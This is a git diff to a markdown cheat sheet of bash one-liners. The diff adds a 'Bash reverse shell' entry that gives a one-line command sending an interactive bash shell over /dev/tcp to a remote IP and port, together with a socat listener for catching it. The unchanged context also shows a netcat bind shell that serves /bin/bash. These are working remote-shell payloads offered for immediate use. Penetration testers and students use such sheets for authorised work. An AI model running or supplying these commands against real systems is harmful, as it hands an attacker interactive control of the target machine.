diff --git a/scripting/bash.md b/scripting/bash.md index abf1347..d4276fb 100644 --- a/scripting/bash.md +++ b/scripting/bash.md @@ -113,6 +113,21 @@ nc -e /bin/bash -lp *port* cat /proc/cpuinfo ``` +**Bash reverse shell** (@icleus) + +Works on all (recent) distributions where egress filtering is not in place / quite open, use this to reverse connect to your listening host. + +```bash +bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 & +``` + +I find this best works with a socat listener due to the readline support. + +```bash +socat readline TCP-LISTEN:1234 +``` + + Credits ----------- Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)